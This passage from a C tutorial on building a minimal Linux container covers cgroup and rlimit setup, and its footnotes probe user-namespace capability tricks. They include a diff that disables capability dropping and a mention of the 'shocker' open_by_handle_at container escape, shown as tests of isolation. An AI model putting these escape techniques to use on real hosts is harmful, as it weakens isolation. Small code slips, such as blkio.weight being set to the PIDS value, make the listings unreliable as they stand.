kexec_file_load and kexec_load are prevented by CAP_SYS_BOOT ⁷⁴.

nice can only be used to lower priority without CAP_SYS_NICE ⁷⁵.

oldfstat, oldlstat, oldolduname, oldstat, and olduname are just older versions of their respective functions. I expect them to have the same security properties as the modern ones.

perfmonctl ⁷⁶ is only available on IA-64. ppc_rtas ⁷⁷, spu_create ⁷⁸ and spu_run ⁷⁹, and subpage_prot ⁸⁰ are only avaiable on PowerPC. utrap_install is only available on Sparc⁸¹. kern_features is only available on Sparc64, and should be harmless anyway⁸².

I don't believe pivot_root is a problem in our setup (but it could probably be used to circumvent path-based MAC).

preadv2 and pwritev2 are just extensions to preadv and pwritev / readv and writev, which are "scatter input" / "gather output" extensions to read and write ⁸³.

Resources

We'd like to prevent badly-behaved child processes from denying service to the rest of the system⁸⁴. Cgroups let us limit memory and cpu time in particular; limiting the pid count and IO usage is also useful. There's a very useful document in the kernel tree about it.

The cgroup and cgroup2 filesystems are the canonical interfaces to the cgroup system. cgroup2 is a little different, and unitialized on my system, so I'll use the first version here.

Cgroup namespaces are a little different from, for example, mount namespaces. We need to create the cgroup before we enter a cgroup namespace; once we do, that cgroup will behave like the root cgroup inside of the namespace⁸⁵. This isn't the most relevant, since a contained process can't mount the cgroup filesystem or /proc for introspection, but it's nice to be thorough.

I'll set up a struct so I don't have to repeat myself too much, with the following instructions:

Set memory/$hostname/memory.limit_in_bytes, so the contained process and its child processes can't total more than 1GB memory in userspace⁸⁶.
Set memory/$hostname/memory.kmem.limit_in_bytes, so that the contained process and its child processes can't total more than 1GB memory in userspace⁸⁷.
Set cpu/$hostname/cpu.shares to 256. CPU shares are chunks of 1024; 256 * 4 = 1024, so this lets the contained process take a quarter of cpu-time on a busy system at most⁸⁸.
Set the pids/$hostname/pid.max, allowing the contained process and its children to have 64 pids at most. This is useful because there are per-user pid limits that we could hit on the host if the contained process occupies too many⁸⁹.
Set blkio/$hostname/weight to 50, so that it's lower than the rest of the system and prioritized accordingly⁹⁰.

I'll also add the calling process for each of {memory,cpu,blkio,pids}/$hostname/tasks by writing '0' to it.

Listing 181: <<resources>> +=

#define MEMORY "1073741824"
#define SHARES "256"
#define PIDS "64"
#define WEIGHT "10"
#define FD_COUNT 64

struct cgrp_control {
	char control[256];
	struct cgrp_setting {
		char name[256];
		char value[256];
	} **settings;
};
struct cgrp_setting add_to_tasks = {
	.name = "tasks",
	.value = "0"
};

struct cgrp_control *cgrps[] = {
	& (struct cgrp_control) {
		.control = "memory",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "memory.limit_in_bytes",
				.value = MEMORY
			},
			& (struct cgrp_setting) {
				.name = "memory.kmem.limit_in_bytes",
				.value = MEMORY
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
		.control = "cpu",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "cpu.shares",
				.value = SHARES
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
		.control = "pids",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "pids.max",
				.value = PIDS
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
		.control = "blkio",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "blkio.weight",
				.value = PIDS
			},
			&add_to_tasks,
			NULL
		}
	},
	NULL
};

Writing to the cgroups version 1 filesystem works like this⁹¹:

In each controller, you can create a cgroup with a name with mkdir. For memory, mkdir /sys/fs/cgroup/memory/$hostname.
Inside of that you can write to the individual files to set values. For example, echo $MEMORY > /sys/fs/cgroup/memory/$hostname/memory.limit_in_bytes.
You can a pid to tasks to add the process tree to the cgroup. "0" is a special value that means "the writing process".

so I'll iterate over that structure and fill in the values.

Listing 183: <<resources>> +=

int resources(struct child_config *config)
{
	fprintf(stderr, "=> setting cgroups...");
	for (struct cgrp_control **cgrp = cgrps; *cgrp; cgrp++) {
		char dir[PATH_MAX] = {0};
		fprintf(stderr, "%s...", (*cgrp)->control);
		if (snprintf(dir, sizeof(dir), "/sys/fs/cgroup/%s/%s",
			     (*cgrp)->control, config->hostname) == -1) {
			return -1;
		}
		if (mkdir(dir, S_IRUSR | S_IWUSR | S_IXUSR)) {
			fprintf(stderr, "mkdir %s failed: %m\n", dir);
			return -1;
		}
		for (struct cgrp_setting **setting = (*cgrp)->settings; *setting; setting++) {
			char path[PATH_MAX] = {0};
			int fd = 0;
			if (snprintf(path, sizeof(path), "%s/%s", dir,
				     (*setting)->name) == -1) {
				fprintf(stderr, "snprintf failed: %m\n");
				return -1;
			}
			if ((fd = open(path, O_WRONLY)) == -1) {
				fprintf(stderr, "opening %s failed: %m\n", path);
				return -1;
			}
			if (write(fd, (*setting)->value, strlen((*setting)->value)) == -1) {
				fprintf(stderr, "writing to %s failed: %m\n", path);
				close(fd);
				return -1;
			}
			close(fd);
		}
	}
	fprintf(stderr, "done.\n");

I'll also lower the hard limit on the number of file descriptors. The file descriptor number, like the number of pids, is per-user, and so we want to prevent in-container process from occupying all of them. Setting the hard limit sets a permanent upper bound for this process tree, since I've dropped CAP_SYS_RESOURCE ⁹².

Listing 185: <<resources>> +=

	fprintf(stderr, "=> setting rlimit...");
	if (setrlimit(RLIMIT_NOFILE,
		      & (struct rlimit) {
			.rlim_max = FD_COUNT,
			.rlim_cur = FD_COUNT,
		})) {
		fprintf(stderr, "failed: %m\n");
		return 1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}

We'd also like to clean up the cgroup for this hostname. There's built-in functionality for this, but we would need to change system-wide values to do it cleanly⁹³. Since we have the contained process waiting on the contained process, it's simple to do it this way. First we move the contained process back into the root tasks; then, since the child process is finished, and leaving the pid namespace SIGKILLS its children, the tasks is empty. We can safely rmdir at this point.

Listing 187: <<resources>> +=

int free_resources(struct child_config *config)
{
	fprintf(stderr, "=> cleaning cgroups...");
	for (struct cgrp_control **cgrp = cgrps; *cgrp; cgrp++) {
		char dir[PATH_MAX] = {0};
		char task[PATH_MAX] = {0};
		int task_fd = 0;
		if (snprintf(dir, sizeof(dir), "/sys/fs/cgroup/%s/%s",
			     (*cgrp)->control, config->hostname) == -1
		    || snprintf(task, sizeof(task), "/sys/fs/cgroup/%s/tasks",
				(*cgrp)->control) == -1) {
			fprintf(stderr, "snprintf failed: %m\n");
			return -1;
		}
		if ((task_fd = open(task, O_WRONLY)) == -1) {
			fprintf(stderr, "opening %s failed: %m\n", task);
			return -1;
		}
		if (write(task_fd, "0", 2) == -1) {
			fprintf(stderr, "writing to %s failed: %m\n", task);
			close(task_fd);
			return -1;
		}
		close(task_fd);
		if (rmdir(dir)) {
			fprintf(stderr, "rmdir %s failed: %m", dir);
			return -1;
		}
	}
	fprintf(stderr, "done.\n");
	return 0;
}

Networking

Container networking takes a little too much explanation for this space. It usually works like this:

Create a bridge device.
Create a virtual ethernet pair and attach one end to the bridge.
Put the other end in the network namespace.
For outside networking access, the host needs to be set to forward (and possibly NAT) packets.

Having multiple contained processes sharing a bridge device would mean they're both on the same LAN from the host's perspective. So ARP spoofing is a recurring issue with containers that work this way⁹⁴.

The canonical way to do this from C is the rtnetlink interface; it would probably be easier to use ip link ....

We could also limit the network usage with the net_prio cgroup controller⁹⁵.

Footnotes:

"Linux User Namespaces Might Not Be Secure Enough" by Erica Windisch:

If a (real) root user has had the SYS_CAP_ADMIN capability removed, but then creates a user namespace, this capability is restored for the (fake) root user. That is, before creating the namespace, ‘mount’ would be denied, but following the creation of the user namespace, the ‘mount’ syscall would magically work again, albeit in a limited fashion. While limited in function, it’s significant enough that given a (real) root user and a kernel with user namespaces, Linux capabilities may be completely subverted.

and man 7 user_namespaces says:

The child process created by clone(2) with the CLONE_NEWUSER flag starts out with a complete set of capabilities in the new user namespace.

and "Understanding and Hardening Linux Containers" again

User namespaces also allows for ``interesting'' intersections of security models, whereas full root capabilities are granted to new namespace. This can allow CLONE_NEWUSER to effectively use CAP_NET_ADMIN over other network namespaces as they are exposed, and if containers are not in use. Additionally, as we have seen many times, processes with CAP_NET_ADMIN have a large attack surface and have resulted in a number of different kernel vulnerabilities. This may allow an unprivileged user namespace to target a large attack surface (the kernel networking subsystem) whereas a privileged container with reduced capabilities would not have such permissions. See Section 5.5 on page 39 for a more in-depth discussion on this topic.

We can demonstrate this behavior (on a host with user namespaces compiled in) with

Listing 1: subverting_networking.c

/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -static  subverting_networking.c \*/
/*                   -o subverting_networking" */
/* End: */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sched.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/sockios.h>

int main (int argc, char **argv)
{
	if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) {
		fprintf(stderr, "++ unshare failed: %m\n");
		return 1;
	}
	/* this is how you create a bridge... */
	int sock = 0;
	if ((sock = socket(PF_LOCAL, SOCK_STREAM, 0)) == -1) {
		fprintf(stderr, "++ socket failed: %m\n");
		return 1;
	}
	if (ioctl(sock, SIOCBRADDBR, "br0")) {
		fprintf(stderr, "++ ioctl failed: %m\n");
		close(sock);
		return 1;
	}
	close(sock);
	fprintf(stderr, "++ success!\n");
	return 0;
}

  alpine-kernel-dev:~$ whoami
  lizzie
  alpine-kernel-dev:~$ ./subverting_networking
  ++ success!
  alpine-kernel-dev:~$

but we're not actually that powerful.

Listing 2: subverting_setfcap.c

/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -lcap -static subverting_setfcap.c \*/
/*                   -o subverting_setfcap" */
/* End: */
#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <linux/capability.h>
#include <sys/capability.h>

int main (int argc, char **argv)
{
	if (unshare(CLONE_NEWUSER)) {
		fprintf(stderr, "++ unshare failed: %m\n");
		return 1;
	}
	cap_t cap = cap_from_text("cap_net_admin+ep");
	if (cap_set_file("example", cap)) {
		fprintf(stderr, "++ cap_set_file failed: %m\n");
		cap_free(cap);
		return 1;
	}
	cap_free(cap);
	return 0;
}

  alpine-kernel-dev:~$ whoami
  lizzie
  alpine-kernel-dev:~$ touch example
  alpine-kernel-dev:~$ ./subverting_setfcap
  ++ cap_set_file failed: Operation not permitted

init/Kconfig:1207@c8d2bc

config USER_NS
	bool "User namespace"
	default n
	help
	  This allows containers, i.e. vservers, to use user namespaces
	  to provide different user info for different servers.

	  When user namespaces are enabled in the kernel it is
	  recommended that the MEMCG option also be enabled and that
	  user-space use the memory control groups to limit the amount
	  of memory a memory unprivileged users can use.

	  If unsure, say N.

Ubuntu switches CONFIG_USER_NS on, but patches it so that it unprivileged use can be disabled with a sysctl, unpriviliged_userns_clone.

Listing 3: 92e575e769cc50a9bfb50fb58fe94aab4f2a2bff

commit 92e575e769cc50a9bfb50fb58fe94aab4f2a2bff
Author: Serge Hallyn <redacted>
Date:   Tue Jan 5 20:12:21 2016 +0000

    UBUNTU: SAUCE: add a sysctl to disable unprivileged user namespace unsharing
    
    It is turned on by default, but can be turned off if admins prefer or,
    more importantly, if a security vulnerability is found.
    
    The intent is to use this as mitigation so long as Ubuntu is on the
    cutting edge of enablement for things like unprivileged filesystem
    mounting.
    
    (This patch is tweaked from the one currently still in Debian sid, which
    in turn came from the patch we had in saucy)
    
    Signed-off-by: Serge Hallyn <redacted>
    [bwh: Remove unneeded binary sysctl bits]
    Signed-off-by: Tim Gardner <redacted>

Debian has the same behavior:

Listing 4: debian/patches/debian/add-sysctl-to-allow-unprivileged-CLONE_NEWUSER-by-default.patch

From: Serge Hallyn <redacted>
Date: Fri, 31 May 2013 19:12:12 +0000 (+0100)
Subject: add sysctl to disallow unprivileged CLONE_NEWUSER by default
Origin: http://kernel.ubuntu.com/git?p=serge%2Fubuntu-saucy.git;a=commit;h=5c847404dcb2e3195ad0057877e1422ae90892b8

add sysctl to disallow unprivileged CLONE_NEWUSER by default

This is a short-term patch.  Unprivileged use of CLONE_NEWUSER
is certainly an intended feature of user namespaces.  However
for at least saucy we want to make sure that, if any security
issues are found, we have a fail-safe.

Signed-off-by: Serge Hallyn <redacted>
[bwh: Remove unneeded binary sysctl bits]
---

Grsecurity disables it entirely for users without CAP_SYS_ADMIN, CAP_SETUID, and CAP_SETGID.

Listing 5: https://grsecurity.net/test/grsecurity-3.1-4.7.9-201610200819.patch

--- a/kernel/user_namespace.c
+++ b/kernel/user_namespace.c
@@ -84,6 +84,21 @@ int create_user_ns(struct cred *new)
 	    !kgid_has_mapping(parent_ns, group))
 		return -EPERM;
 
+#ifdef CONFIG_GRKERNSEC
+	/*
+	 * This doesn't really inspire confidence:
+	 * http://marc.info/?l=linux-kernel&m=135543612731939&w=2
+	 * http://marc.info/?l=linux-kernel&m=135545831607095&w=2
+	 * Increases kernel attack surface in areas developers
+	 * previously cared little about ("low importance due
+	 * to requiring "root" capability")
+	 * To be removed when this code receives *proper* review
+	 */
+	if (!capable(CAP_SYS_ADMIN) || !capable(CAP_SETUID) ||
+			!capable(CAP_SETGID))
+		return -EPERM;
+#endif

and Arch Linux has it off.

Listing 6: {linux} 3.13 add CONFIG_USER_NS

Comment by William Kennington (Webhostbudd) - Sunday, 06 October 2013, 03:55 GMT

I agree with Florian, allowing non-root users to take advantage of
elevating themselves to a local root seems like a huge attack
surface. Preferably this would be a sysctl with a huge warning
attached to it when it is switched on.

Comment by Daniel Micay (thestinger) - Monday, 24 November 2014, 03:55 GMT

[...]  Arch doesn't add new features via patches. If you want to see
this feature enabled, then land something like this upstream. Note
that CONFIG_USER_NS is already enabled in the linux-grsec package
because it fully removes the ability to have unprivileged user
namespaces.

It would have been cool to include Red Hat's patches here, but I couldn't find them.

⁴

Most of this section is cribbed from the example at the bottom of man 2 clone.

⁵

Listing 11: clone_stack.c

/* -*- compile-command: "gcc -Wall -Werror clone_stack.c -o clone_stack" -*- */
#define _GNU_SOURCE
#include <sched.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define STACK_SIZE (1024 * 1024)

int child (void *_)
{
	int stack_value = 0;
	fprintf(stderr, "pre-execve, stack is ~%p\n", &stack_value);
	execve("./show_stack", (char  *[]) {",/show_stack", 0}, NULL);
	return 0;
}

int main (int argc, char **argv) {
	void *stack = malloc(STACK_SIZE);
	clone(child, stack + STACK_SIZE, SIGCHLD, NULL);
	wait(NULL);
	return 0;
}

Listing 12: show_stack.c

/* -*- compile-command: "gcc -Wall -Werror -static show_stack.c -o show_stack" -*- */
#include <stdio.h>

int main (int argc, char **argv)
{
	int stack_value = 0;
	fprintf(stderr, "post-execve, stack is ~%p\n", &stack_value);
	return 0;
}

  [lizzie@empress linux-containers-in-500-loc]$ ./clone_stack
  pre-execve, stack is ~0x7f3f98deefec
  post-execve, stack is ~0x7ffd14d2291c

The stack grows down on x86, so the fact that the address is higher numerically post-execve means that a new stack has been allocated.

⁶

I thought this might be undefined behavior, since stack + STACK_SIZE does point past the last item of the array, but point 8 of 6.5.6 [Additive operators] in ISO-9899 has us covered:

If both the pointer operand and the result point to elements of the same array object, or one past the last element of the array object, the evaluation shall not produce an overflow; otherwise, the behavior is undefined. If the result points one past the last element of the array object, it shall not be used as the operand of a unary * operator that is evaluated.

i.e., the pointer addition is valid, but dereferencing it wouldn't be.

⁷

I wasn't confident that waitpid was enough to wait for the process and all of its children, but when the root of a pid namespace closes, all of its children get SIGKILL:

man 7 pid_namespaces:

If the "init" process of a PID namespace terminates, the kernel terminates all of the processes in the namespace via a SIGKILL signal. This behavior reflects the fact that the "init" process is essential for the correct operation of a PID namespace.

Also verified this myself, before I found that:

Listing 18: persistent_child.c

/* -*- compile-command: "gcc -Wall -Werror -static persistent_child.c -o persistent_child" -*- */
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main (int argc, char **argv)
{
	switch (fork()) {
	case -1:
		fprintf(stderr, "++ fork failed: %m\n");
		return 1;
	case 0:;
		int fd = 0;
		if ((fd = open("persistent_child.log",
			       O_CREAT | O_APPEND | O_WRONLY,
			       S_IRUSR | S_IWUSR)) == -1) {
			fprintf(stderr, "++ open failed: %m\n");
			return 1;
		}
		size_t count = 0;
		while (count < 100) {
			if (dprintf(fd, "%lu\n", count++) < 0) {
				fprintf(stderr, "++ dprintf failed: %m\n");
				close(fd);
				return 1;
			}
			sleep(1);
		}
		close(fd);
		return 0;
	default:
		sleep(2);
		return 0;
	}
}

[lizzie@empress l-c-i-500-l]$ touch persistent_child.log 
[lizzie@empress l-c-i-500-l]$ chmod 666 persistent_child.log 
[lizzie@empress l-c-i-500-l]$ sudo strace -f ./contained -m . -u 0 -c ./persistent_child
execve("./contained", ["./contained", "-m", ".", "-u", "0", "-c", "./persistent_child"], [/* 15 vars */]) = 0
brk(NULL)                               = 0x605490
# ...
[pid   736] clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x6b68d0) = 2
strace: Process 746 attached
[pid   736] nanosleep({2, 0},  <unfinished ...>
[pid   746] open("persistent_child.log", O_WRONLY|O_CREAT|O_APPEND, 0600) = 3
[pid   746] fstat(3, {st_mode=S_IFREG|0666, st_size=4, ...}) = 0
[pid   746] lseek(3, 0, SEEK_CUR)       = 0
[pid   746] write(3, "0\n", 2)          = 2
[pid   746] nanosleep({1, 0}, 0x3fee2d718d0) = 0
[pid   746] fstat(3, {st_mode=S_IFREG|0666, st_size=6, ...}) = 0
[pid   746] lseek(3, 0, SEEK_CUR)       = 6
[pid   746] write(3, "1\n", 2)          = 2
[pid   746] nanosleep({1, 0},  <unfinished ...>
[pid   736] <... nanosleep resumed> 0x3fee2d718d0) = 0
[pid   736] exit_group(0)               = ?
[pid   746] +++ killed by SIGKILL +++
[pid   736] +++ exited with 0 +++
# ...

Listing 19: <<namespaces>> +=

	close(sockets[1]);
	sockets[1] = 0;
	if (handle_child_uid_map(child_pid, sockets[0])) {
		err = 1;
		goto kill_and_finish_child;
	}

	goto finish_child;
kill_and_finish_child:
	if (child_pid) kill(child_pid, SIGKILL);
finish_child:;
	int child_status = 0;
	waitpid(child_pid, &child_status, 0);
	err |= WEXITSTATUS(child_status);
clear_resources:
	free_resources(&config);
	free(stack);

A process setting its own user namespace is pretty limited⁸, so the parent will wait until the child enters the user namespace, and then write a mapping to its uid_map and gid_map.

⁸

Listing 20: man 7 user_namespaces

	In order for  a process to write  to the /proc/[pid]/uid_map
	(/proc/[pid]/gid_map)   file,    all   of    the   following
	requirements must be met:

	1. The writing process must have the CAP_SETUID (CAP_SETGID)
	   capability in the user namespace of the process pid.

	2. The writing process must either  be in the user namespace
	   of the process pid or be  in the parent user namespace of
	   the process pid.

	3. The  mapped user  IDs (group  IDs)  must in  turn have  a
	   mapping in the parent user namespace.

	4. One of the following two cases applies:

	   *  Either   the  writing   process  has   the  CAP_SETUID
		 (CAP_SETGID) capability in the parent user namespace.

		 +  No further restrictions apply: the process can make
		    mappings to  arbitrary user IDs (group  IDs) in the
		    parent user namespace.

	   *  Or otherwise all of the following restrictions apply:

		 +  The data written to  uid_map (gid_map) must consist
		    of a  single line  that maps the  writing process's
		    effective  user ID  (group ID)  in the  parent user
		    namespace  to a  user  ID (group  ID)  in the  user
		    namespace.

		 +  The writing  process must  have the  same effective
		    user  ID  as  the  process that  created  the  user
		    namespace.

		 +  In  the case  of gid_map,  use of  the setgroups(2)
		    system call must first be denied by writing deny to
		    the /proc/[pid]/setgroups  file (see  below) before
		    writing to gid_map.

	Writes  that violate  the above  rules fail  with the  error
	EPERM.

⁹

gid, sgid, and egid are separate from group_info in struct cred:

Listing 22: include/linux/cred.h:95@c8d2bc

/*
 * The security context of a task
 *
 * The parts of the context break down into two categories:
 *
 *  (1) The objective context of a task.  These parts are used when some other
 *	task is attempting to affect this one.
 *
 *  (2) The subjective context.  These details are used when the task is acting
 *	upon another object, be that a file, a task, a key or whatever.
 *
 * Note that some members of this structure belong to both categories - the
 * LSM security pointer for instance.
 *
 * A task has two security pointers.  task->real_cred points to the objective
 * context that defines that task's actual details.  The objective part of this
 * context is used whenever that task is acted upon.
 *
 * task->cred points to the subjective context that defines the details of how
 * that task is going to act upon another object.  This may be overridden
 * temporarily to point to another security context, but normally points to the
 * same context as task->real_cred.
 */
struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
};

¹⁰

For example, test_perm in the /proc/sys-handling-code:

Listing 25: fs/proc/proc_sysctl.c:406@c8d2bc

static int test_perm(int mode, int op)
{
	if (uid_eq(current_euid(), GLOBAL_ROOT_UID))
		mode >>= 6;
	else if (in_egroup_p(GLOBAL_ROOT_GID))
		mode >>= 3;
	if ((op & ~mode & (MAY_READ|MAY_WRITE|MAY_EXEC)) == 0)
		return 0;
	return -EACCES;
}

¹¹

Listing 26: try_regain_cap.c

/* -*- compile-command: "gcc -Wall -Werror -static try_regain_cap.c -o try_regain_cap" -*- */
#include <linux/capability.h>
#include <sys/prctl.h>
#include <stdio.h>

int main (int argc, char  **argv)
{
	if (prctl(PR_CAPBSET_READ, CAP_MKNOD, 0, 0, 0)) {
 		fprintf(stderr, "++ have CAP_MKNOD\n");
	} else {
		fprintf(stderr, "++ don't have CAP_MKNOD\n");
	}
	return 0;
}

If we drop the bounding set, files with extra capabilities don't get those capabilities:

[lizzie@empress l-c-i-500-l]$ sudo setcap "cap_mknod+p" try_regain_cap
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.lVLNB1...done.
=> trying a user namespace...writing /proc/852/uid_map...writing /proc/852/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ don't have CAP_MKNOD
=> cleaning cgroups...done.

but if we don't, they work:

Listing 27: allow_all_caps.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..6ab1719 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -53,10 +53,7 @@ int capabilities()
 	size_t num_caps = sizeof(drop_caps) / sizeof(*drop_caps);
 	fprintf(stderr, "bounding...");
 	for (size_t i = 0; i < num_caps; i++) {
-		if (prctl(PR_CAPBSET_DROP, drop_caps[i], 0, 0, 0)) {
-			fprintf(stderr, "prctl failed: %m\n");
-			return 1;
-		}
+		continue;
 	}
 	fprintf(stderr, "inheritable...");
 	cap_t caps = NULL;

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_all_caps -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Qnzw2A...done.
=> trying a user namespace...writing /proc/940/uid_map...writing /proc/940/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ have CAP_MKNOD
=> cleaning cgroups...done.

(and if we set +ep, execve fails because it's considered a "capability-dumb binary")

[lizzie@empress l-c-i-500-l]$ sudo setcap "cap_mknod+ep" try_regain_cap
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Esog3p...done.
=> trying a user namespace...writing /proc/994/uid_map...writing /proc/994/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
execve failed! Operation not permitted.
=> cleaning cgroups...done.

Listing 28: man 7 capabilities

   Safety checking for capability-dumb binaries
	A  capability-dumb binary  is an  application that  has been
	marked to have file capabilities, but has not been converted
	to  use the  libcap(3) API  to manipulate  its capabilities.
	(In  other words,  this  is  a traditional  set-user-ID-root
	program that has been switched to use file capabilities, but
	whose   code   has   not   been   modified   to   understand
	capabilities.)    For  such   applications,  the   effective
	capability  bit  is  set  on  the file,  so  that  the  file
	permitted  capabilities  are  automatically enabled  in  the
	process effective  set when executing the  file.  The kernel
	recognizes a file which has the effective capability bit set
	as capability-dumb  for the  purpose of the  check described
	here.

	When executing  a capability-dumb binary, the  kernel checks
	if the process obtained all permitted capabilities that were
	specified in  the file  permitted set, after  the capability
	transformations described  above have been  performed.  (The
	typical  reason  why  this  might  not  occur  is  that  the
	capability bounding set masked  out some of the capabilities
	in the file  permitted set.)  If the process  did not obtain
	the full set of  file permitted capabilities, then execve(2)
	fails with the error EPERM.  This prevents possible security
	risks that could arise when a capability-dumb application is
	executed with less  privilege that it needs.   Note that, by
	definition, the application could  not itself recognize this
	problem, since it does not employ the libcap(3) API.

¹²

Listing 30: kernel/audit.c:663@c8d2bc

switch (msg_type) {
case AUDIT_LIST:
case AUDIT_ADD:
case AUDIT_DEL:
	return -EOPNOTSUPP;
case AUDIT_GET:
case AUDIT_SET:
case AUDIT_GET_FEATURE:
case AUDIT_SET_FEATURE:
case AUDIT_LIST_RULES:
case AUDIT_ADD_RULE:
case AUDIT_DEL_RULE:
case AUDIT_SIGNAL_INFO:
case AUDIT_TTY_GET:
case AUDIT_TTY_SET:
case AUDIT_TRIM:
case AUDIT_MAKE_EQUIV:
	/* Only support auditd and auditctl in initial pid namespace
	 * for now. */
	if (task_active_pid_ns(current) != &init_pid_ns)
		return -EPERM;

	if (!netlink_capable(skb, CAP_AUDIT_CONTROL))
		err = -EPERM;
	break;
case AUDIT_USER:
case AUDIT_FIRST_USER_MSG ... AUDIT_LAST_USER_MSG:
case AUDIT_FIRST_USER_MSG2 ... AUDIT_LAST_USER_MSG2:
	if (!netlink_capable(skb, CAP_AUDIT_WRITE))
		err = -EPERM;
	break;
default:  /* bad msg */
	err = -EINVAL;
}

¹³

You can obtain an audit system file descriptor by calling

socket(AF_NETLINK, SOCK_DGRAM, NETLINK_AUDIT)

Listing 31: man 7 netlink

NETLINK(7) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

NAME
	netlink  -  communication  between  kernel  and  user  space
	(AF_NETLINK)
SYNOPSIS
	[...]
	netlink_socket = socket(AF_NETLINK, socket_type, netlink_family);
	[...]
DESCRIPTION
	Netlink is  used to transfer information  between the kernel
	and  user-space  processes.   It   consists  of  a  standard
	sockets-based  interface for  user  space  processes and  an
	internal kernel API for kernel modules.
	[...]
	netlink_family selects the kernel module or netlink group to
	communicate with.   The currently assigned  netlink families
	are:
	[...]
	NETLINK_AUDIT (since Linux 2.6.6)
		Auditing.

¹⁴

Listing 33: man 7 capabilities

	CAP_BLOCK_SUSPEND (since Linux 3.5)
		Employ features that can block system suspend (epoll(7)
		EPOLLWAKEUP, /proc/sys/wake_lock).

¹⁵

An email and description by Sebastian Krahmer

In 0.11 the problem is that the apps that run in the container have CAP_DAC_READ_SEARCH and CAP_DAC_OVERRIDE which allows the containered app to access files not just by pathname (which would be impossible due to the bind mount of the rootfs) but also by handles via open_by_handle_at(). Handles are mostly 64bit values and can be kind of pre-computed as they are inode-based and the inode of / is 2. So you can go ahead and walk / by passing a handle of 2 and search the FS until you find the inode# of the file you want to access. Even though you are containered somewhere in /var/lib.

which links to the code, shocker.c.

Note that, if usernamespaces are on, we're not vulnerable, since open_by_handle_at checks for CAP_DAC_READ_SEARCH in the root namespace:

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.GSmTxw...done.
